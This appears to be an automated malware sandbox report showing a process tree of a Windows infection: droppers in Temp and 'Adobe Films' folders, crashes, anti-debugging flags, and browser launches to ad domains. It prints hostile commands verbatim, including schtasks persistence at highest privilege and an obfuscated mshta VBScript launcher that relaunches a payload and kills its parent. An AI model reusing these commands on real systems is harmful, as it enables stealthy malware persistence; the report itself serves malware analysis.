C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6888 /prefetch:88⤵
- Modifies registry class
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.CdmService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=cdm --mojo-platform-channel-handle=3544 /prefetch:88⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7300 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7308 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7560 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=7908 /prefetch:88⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4364 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.CdmService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=cdm --mojo-platform-channel-handle=7816 /prefetch:88⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7392 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8048 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7740 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8400 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8564 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8804 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1788 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:18⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9152 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8020 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8844 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8932 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1944 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7176 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9204 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:18⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09c42cad92c20f79.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09c42cad92c20f79.exeWed09c42cad92c20f79.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 2406⤵
- Program crash
- Checks processor information in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09db0d52c38.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09db0d52c38.exeWed09db0d52c38.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 19446⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09977fdc12334.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09977fdc12334.exeWed09977fdc12334.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\ntvQls6W0Z9SGx99cektYOrz.exe"C:\Users\Admin\Pictures\Adobe Films\ntvQls6W0Z9SGx99cektYOrz.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\jbxxMselF7ZbInsUkMPdKh9r.exe"C:\Users\Admin\Pictures\Adobe Films\jbxxMselF7ZbInsUkMPdKh9r.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1988 -s 2767⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gcqDb5zSn7BE_dUbS8yv3WOT.exe"C:\Users\Admin\Pictures\Adobe Films\gcqDb5zSn7BE_dUbS8yv3WOT.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\Documents\hhRo_PY9JOjFbOXY45EnaDd8.exe"C:\Users\Admin\Documents\hhRo_PY9JOjFbOXY45EnaDd8.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\IEObGDEzFQtHW3zNznFK1dXO.exe"C:\Users\Admin\Pictures\Adobe Films\IEObGDEzFQtHW3zNznFK1dXO.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\PHNkeRSrHp1xLWHoFmTnx6qg.exe"C:\Users\Admin\Pictures\Adobe Films\PHNkeRSrHp1xLWHoFmTnx6qg.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 17289⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\iyNQnVOAzpWstmRh0RYo_sir.exe"C:\Users\Admin\Pictures\Adobe Films\iyNQnVOAzpWstmRh0RYo_sir.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7548 -s 2809⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\jWPcmwBpFAECsMFY3BorBrqI.exe"C:\Users\Admin\Pictures\Adobe Films\jWPcmwBpFAECsMFY3BorBrqI.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\Ga2XGzxOu7DtE8i1v4n88R7k.exe"C:\Users\Admin\Pictures\Adobe Films\Ga2XGzxOu7DtE8i1v4n88R7k.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 2449⤵
- Program crash
- Checks processor information in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe"C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "1wpMgPxBb0rpgylDEVM8FTrO.exe"11⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Cm5c7bP8UuesESgVtGU2jbXU.exe"C:\Users\Admin\Pictures\Adobe Films\Cm5c7bP8UuesESgVtGU2jbXU.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\Cm5c7bP8UuesESgVtGU2jbXU.exe"C:\Users\Admin\Pictures\Adobe Films\Cm5c7bP8UuesESgVtGU2jbXU.exe" -u9⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\kShuz28BBCUnH_NSSeWHruw8.exe"C:\Users\Admin\Pictures\Adobe Films\kShuz28BBCUnH_NSSeWHruw8.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-EA9EE.tmp\kShuz28BBCUnH_NSSeWHruw8.tmp"C:\Users\Admin\AppData\Local\Temp\is-EA9EE.tmp\kShuz28BBCUnH_NSSeWHruw8.tmp" /SL5="$40272,506127,422400,C:\Users\Admin\Pictures\Adobe Films\kShuz28BBCUnH_NSSeWHruw8.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CCK6P.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-CCK6P.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Photo Viewer\VGZXDYHCPN\foldershare.exe"C:\Program Files\Windows Photo Viewer\VGZXDYHCPN\foldershare.exe" /VERYSILENT11⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Users\Admin\AppData\Local\Temp\76-91592-c72-3c88c-827d976eeb7eb\Gufiwylaehu.exe"C:\Users\Admin\AppData\Local\Temp\76-91592-c72-3c88c-827d976eeb7eb\Gufiwylaehu.exe"11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471813⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471813⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471813⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵
-
